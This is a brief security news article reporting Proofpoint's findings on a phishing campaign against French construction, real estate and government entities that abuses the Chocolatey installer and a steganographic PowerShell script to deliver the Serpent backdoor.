New Backdoor Targets French Entities via Open-Source Package Installer

Researchers have exposed a new targeted email campaign aimed at French entities in the construction, real estate, and government sectors that leverages the Chocolatey Windows package manager to deliver a backdoor called Serpent on compromised systems.

Enterprise security firm Proofpoint attributed the attacks to a likely advanced threat actor based on the tactics and the victimology patterns observed. The ultimate objective of the campaign remains presently unknown.

“The threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote administration, command, and control (C2), data theft, or delivers other additional payloads,” Proofpoint researchers¬†said¬†in a report shared with The Hacker News.

The phishing lure that triggers the infection sequence makes use of a resume-themed subject line, with the attached macro-embedded Microsoft Word document masquerading as information related to the European Union’s General Data Protection Regulation (GDPR).

Enabling the macros results in its execution, which retrieves a seemingly harmless image file hosted on a remote server but actually contains a Base64-encoded PowerShell script that’s obscured using steganography, a little-used method of concealing malicious code within an image or audio in order to circumvent detection. Read more:

Leave a Reply

Your email address will not be published. Required fields are marked *